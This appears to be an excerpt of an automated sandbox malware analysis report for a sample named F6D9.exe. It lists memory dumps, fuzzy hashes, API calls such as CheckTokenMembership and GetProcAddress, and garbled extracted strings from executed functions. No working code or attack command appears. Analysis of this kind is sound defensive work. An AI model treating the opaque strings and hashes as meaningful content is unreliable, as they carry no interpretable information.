srand.MSVCRT ref: 00EE1878
rand.MSVCRT ref: 00EE1880
srand.MSVCRT ref: 00EE1890
rand.MSVCRT ref: 00EE1894

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: 2642ad4bc61ca2407615880a2ac2f72dfc57f85ab588cdbf806d71cb57705fcb
Instruction ID: b15cc3d97747055e16dd7265c5c73c74eb2dd4e0cf7fa5568d2312bfc607482c
Opcode Fuzzy Hash: 2642ad4bc61ca2407615880a2ac2f72dfc57f85ab588cdbf806d71cb57705fcb
Instruction Fuzzy Hash: A4E01277A1021CBFD700A7BAEC8A99EBBACDF84161B110566F600E3254E574E9488AB4

Function 00EE6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00EE603C
GetProcAddress.KERNEL32(00000000,00EE6064), ref: 00EE604F

Strings

kernel32.dll, xrefs: 00EE603B

Memory Dump Source

Source File: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 10e1df233e40018a47cfb3ab5d215ce3e8434dc6bff48eddd550e950aaa15cf6
Instruction ID: 5b3c3c8e447bb7f6ecc54ee7819904778996317c2a43c1dd5fa04d8ec60a66a8
Opcode Fuzzy Hash: 10e1df233e40018a47cfb3ab5d215ce3e8434dc6bff48eddd550e950aaa15cf6
Instruction Fuzzy Hash: 49F0F0F11442DD8FEF70CEA5CC44BDE3BE4EB25754F50042AEA09DB281CB348A458B25

Analysis Process: F6D9.exePID: 2768, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	119
Total number of Limit Nodes:	21

Executed Functions

Function 00007FF70B8DE810 Relevance: 109.0, APIs: 4, Strings: 56, Instructions: 3967COMMON

Download Yara Rule

Strings

U8PB, xrefs: 00007FF70B8E1CD7
SQ>, xrefs: 00007FF70B8E1C5C
|3\M, xrefs: 00007FF70B8DF630
29K&, xrefs: 00007FF70B8E1594
U8PB, xrefs: 00007FF70B8E158F
c$&o, xrefs: 00007FF70B8E0CDF
LK@f, xrefs: 00007FF70B8DF1C6
u|, xrefs: 00007FF70B8E0EA9
dfb, xrefs: 00007FF70B8E05AA
cpHi, xrefs: 00007FF70B8DFCB2
#{j, xrefs: 00007FF70B8E08B4
e6M , xrefs: 00007FF70B8E1082
dfb, xrefs: 00007FF70B8E21BC
hTw*, xrefs: 00007FF70B8E09E2
dl!, xrefs: 00007FF70B8E108E
SQ>, xrefs: 00007FF70B8E30AD
{3\M, xrefs: 00007FF70B8DEFCC
e6M , xrefs: 00007FF70B8E325C
e6M , xrefs: 00007FF70B8E149D
29K&, xrefs: 00007FF70B8E0E60
v'Hu, xrefs: 00007FF70B8DF4D5
yl, xrefs: 00007FF70B8DE874
pcR, xrefs: 00007FF70B8DFF14
c$&o, xrefs: 00007FF70B8E14B8
hTw*, xrefs: 00007FF70B8E1DE8
u|, xrefs: 00007FF70B8DEBDC
b~D+, xrefs: 00007FF70B8DE980
d6M , xrefs: 00007FF70B8DFE7A
LK@f, xrefs: 00007FF70B8E39C0
U8PB, xrefs: 00007FF70B8E100E
yl, xrefs: 00007FF70B8DFC52
|3\M, xrefs: 00007FF70B8E389D
mF, xrefs: 00007FF70B8DEA08
GSw', xrefs: 00007FF70B8E20B5
v'Hu, xrefs: 00007FF70B8E0864
!@X, xrefs: 00007FF70B8DEE4F
nF, xrefs: 00007FF70B8E173D
!@X, xrefs: 00007FF70B8DFEFD
dl!, xrefs: 00007FF70B8E207D
SQ>, xrefs: 00007FF70B8E309C
c~D+, xrefs: 00007FF70B8E22B3
SQ>, xrefs: 00007FF70B8E0703
GSw', xrefs: 00007FF70B8E0E6C
xl, xrefs: 00007FF70B8DF138
U8PB, xrefs: 00007FF70B8E1CC2
#{j, xrefs: 00007FF70B8DFAB9
c~D+, xrefs: 00007FF70B8E00FF
g1E, xrefs: 00007FF70B8E1C28
{F"7, xrefs: 00007FF70B8E13AD
29K&, xrefs: 00007FF70B8E182C
U8PB, xrefs: 00007FF70B8E15A2
nF, xrefs: 00007FF70B8DF702
cpHi, xrefs: 00007FF70B8E021A
5no, xrefs: 00007FF70B8E0CEB
5no, xrefs: 00007FF70B8E000D
yl, xrefs: 00007FF70B8E212F

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: !@X$!@X$#{j$#{j$29K&$29K&$29K&$5no$5no$GSw'$GSw'$LK@f$LK@f$SQ>$SQ>$SQ>$SQ>$U8PB$U8PB$U8PB$U8PB$U8PB$b~D+$c$&o$c$&o$cpHi$cpHi$c~D+$c~D+$d6M $dfb$dfb$dl!$dl!$e6M $e6M $e6M $g1E$hTw*$hTw*$mF$nF$nF$u|$u|$v'Hu$v'Hu$xl$yl$yl$yl${3\M${F"7$|3\M$|3\M$pcR
API String ID: 0-1998008778
Opcode ID: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
Instruction ID: 914b0d82b878aa05db199ca5afabf1846457c7ed7d08c3687bb014f50fa21fd0
Opcode Fuzzy Hash: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
Instruction Fuzzy Hash: F383C821A086C6C9FB786B689CA4BBD6391EF44309F90443BC61F8BBF4CF2857518795

Function 00007FF70B93F310 Relevance: 3.1, APIs: 2, Instructions: 87
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.KERNELBASE ref: 00007FF70B93F3E6
CheckTokenMembership.KERNELBASE(?,?,?,?,?,?,?,?,F4EB9223,?,0645EEAE8F7DAD8E,1063196CE2D18368,?,?,00007FF70B8DB07B), ref: 00007FF70B93F442

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID: AllocateCheckInitializeMembershipToken
String ID:
API String ID: 1663163955-0
Opcode ID: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
Instruction ID: e46689e96cec34980da7c5411dd2b95174e731a15d87bb1ae3ddb29310716a1c
Opcode Fuzzy Hash: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
Instruction Fuzzy Hash: AB31B67191C741C7E6249B19E8A43AEB7A0FB84B80F500039EA8E46BB8DF7CD5488B00

Function 00007FF70B9407D0 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 589
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

gFW, xrefs: 00007FF70B940CA8
gFW, xrefs: 00007FF70B940806
gFW, xrefs: 00007FF70B941341
dT, xrefs: 00007FF70B940841
dT, xrefs: 00007FF70B940A92
dT, xrefs: 00007FF70B940C8F

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: gFW$gFW$gFW$dT$dT$dT
API String ID: 0-1908915228
Opcode ID: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
Instruction ID: 806b10a3e727d4b9b719b08a3a13024116f10ecb0080d16a6e08ddb766737cb2
Opcode Fuzzy Hash: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
Instruction Fuzzy Hash: 7F42A232B1CBC5C5DA745709F940BAAA691EBC9790F50413ACF8E87BA4CFBCD5809B50

Function 00007FF70B923030 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JC<., xrefs: 00007FF70B9230A1
KC<., xrefs: 00007FF70B9232B3
gkB2, xrefs: 00007FF70B9231CB
"Yba, xrefs: 00007FF70B923301
"Yba, xrefs: 00007FF70B9233A7
fkB2, xrefs: 00007FF70B92308B
gkB2, xrefs: 00007FF70B9234F7
KC<., xrefs: 00007FF70B9230AC

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: "Yba$"Yba$JC<.$KC<.$KC<.$fkB2$gkB2$gkB2
API String ID: 0-2770720463
Opcode ID: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
Instruction ID: 8628181d2725a400d7690dc80100a83cf90a92241bcbf56745cdf43202f2e884
Opcode Fuzzy Hash: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
Instruction Fuzzy Hash: 71B1D422E2E745D9E974571DE88073EA250EF45790FA10236E98FC3774CF2DD58087A6

Function 00007FF70B93FF60 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%<L,, xrefs: 00007FF70B9403E2
-YV, xrefs: 00007FF70B9401C7
-YV, xrefs: 00007FF70B9400D0
%<L,, xrefs: 00007FF70B940147
-YV, xrefs: 00007FF70B940055

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: %<L,$%<L,$-YV$-YV$-YV
API String ID: 0-1602977039
Opcode ID: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
Instruction ID: 080f6f4b0b62c043d0f13db7cdb3ed0296775c97b8822189772e1db0efb082b8
Opcode Fuzzy Hash: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
Instruction Fuzzy Hash: D1D10626E24B55C6EB609B2DDC807BD62A0BF19788F604532EE4ED3778DF38D6818350

Function 00007FF70B945870 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+I}, xrefs: 00007FF70B945C10
+I}, xrefs: 00007FF70B945996

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: +I}$+I}
API String ID: 0-3898140586
Opcode ID: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
Instruction ID: 75c02c0ba1b09adabf5d7879d2d57cf7c2c51c73a9628ed5c1de84ae59650fbf
Opcode Fuzzy Hash: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
Instruction Fuzzy Hash: 6581E825E3C101C7E974A7AD698093AA6909FA5350FE51236E90FC77F0CFADEA404721

Function 00007FF70B8D4970 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.4[, xrefs: 00007FF70B8D4AAB
.4[, xrefs: 00007FF70B8D4B9B

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: .4[$ .4[
API String ID: 0-1397926279
Opcode ID: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
Instruction ID: 4f14b4dbb1322f0be5d70c6b6c6044b8c3e07734f17cd81d671756f2da35df9b
Opcode Fuzzy Hash: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
Instruction Fuzzy Hash: A6510D12A1AB8885E9115B3EA8413A9E3A0BF99794F944332FD8D93771DF3CE6D18700

Function 00007FF70B8E88F7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00007FF70B8E9314

Strings

H]c, xrefs: 00007FF70B8E92E6

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID: LibraryLoad
String ID: H]c
API String ID: 1029625771-2876529112
Opcode ID: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
Instruction ID: 391594b6c0534b19ee405bdc4fce077a2775e197f3c3e27112aa76de5ccdea06
Opcode Fuzzy Hash: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
Instruction Fuzzy Hash: 5651847260C68681DE749A9CA8947BEA390EF84754F900632D6BEC77F4CF3CD5508BA1

Function 00007FF70B922BA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

phV, xrefs: 00007FF70B922C17

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: phV
API String ID: 0-1350728776
Opcode ID: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
Instruction ID: 70be7b2d55a8bcb389ccc60af2850bf99272224967da70bab795e3516d810c8d
Opcode Fuzzy Hash: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
Instruction Fuzzy Hash: 7841C121E28542C1EA70971CDC81339B680AF557B4FA50A72EE6ED73F0CB68DAD04362

Function 00007FF70B8D6A50 Relevance: 3.3, APIs: 2, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF70B8D6B1D

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
Instruction ID: cee889d9c80bcb4c86bc9e6e82c40f5de93786789685e2d9d76410442e50e43a
Opcode Fuzzy Hash: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
Instruction Fuzzy Hash: 10C1E521A0C66986E6686B1C6C9093DA790DF54750FE0413BE58FC7BF4FF2CEA604B91

Function 00007FF70B945680 Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
Instruction ID: a7401534e395c89576441d2b2bdb6487f2deb17285db4ba7bd115faa070854a9
Opcode Fuzzy Hash: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
Instruction Fuzzy Hash: 1C115121938B45C3DA606F49AC9052EA691EF987A4FD10532E98EC3374CF6DDA504A20

Function 00007FF70B9413D0 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDlgButtonChecked.USER32 ref: 00007FF70B9413FF

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID: ButtonChecked
String ID:
API String ID: 1719414920-0
Opcode ID: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
Instruction ID: ad0808859f5090b72b56ea44d694c3626a4358c9d05a5136d5013f16292c8f00
Opcode Fuzzy Hash: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
Instruction Fuzzy Hash: 4CF0C266A1C29084EA345625F94467AAE60DB99BF4F980875ED8E87BA8CB1DC7818700

Function 00007FF70B945750 Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,00007FF70B8F432B), ref: 00007FF70B9457A5

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
Instruction ID: ec3ff780a75a2dac9405b21a6f6378db5712f9355b752443f5a0cda2536129d1
Opcode Fuzzy Hash: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
Instruction Fuzzy Hash: ABF01D35629B44C6DAA89B59F89062DB7A8FBC8790F501135FA8F83B78DF3DC5508B10

Function 00007FF70B945C40 Relevance: 1.5, APIs: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 00007FF70B945C84

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
Instruction ID: 0f7fa2d7f3e84afb68762b73b6791ec2f084519d473386ba527b8a2e1e9e44c0
Opcode Fuzzy Hash: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
Instruction Fuzzy Hash: 32F0E525628B40C6DA789749ACD063AB7A1FF98741F800176EE4F83774CF7CC5008710

Function 00007FF70B922F40 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE ref: 00007FF70B922F63

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
Instruction ID: 939aa31d2748f67633e79ec49d52513d8c0439513b8e8cf903be75e336021782
Opcode Fuzzy Hash: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
Instruction Fuzzy Hash: 28E0D846D2D291C2A538132928500B9BB615F96354FB50335E6AF91AF0CB0DCB575A14

Non-executed Functions

Function 00007FF70B93F5B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 202COMMON

Download Yara Rule

Strings

X,n, xrefs: 00007FF70B93F6A0
Y,n, xrefs: 00007FF70B93F7CA
Y,n, xrefs: 00007FF70B93F7A0

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: X,n$Y,n$Y,n
API String ID: 0-3478138459
Opcode ID: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
Instruction ID: 20a04874f78178bd3d95e3d0e7725685ab855132de6f99277aaac0750d530fe7
Opcode Fuzzy Hash: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
Instruction Fuzzy Hash: 8A917F22F25B49C8FB119B7E98413AC67B0BF48B98F544622DE4DA3774DF38D5928310

Function 00007FF70B8C5AD4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

]t{, xrefs: 00007FF70B8C608B
]t{, xrefs: 00007FF70B8C60AD

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd

Similarity

API ID:
String ID: ]t{$]t{
API String ID: 0-2389501032
Opcode ID: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
Instruction ID: 22e18c69bde135e380d89d45d37c9451e2391788e42f6556b6339536644cc6af
Opcode Fuzzy Hash: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
Instruction Fuzzy Hash: 35B193A1D1C34247FD7C662E18A59BDE5916FA0200ED4023BE54FC6AF1CF7DBB6046A2

Function 00007FF70B8D7000 Relevance: .5, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true

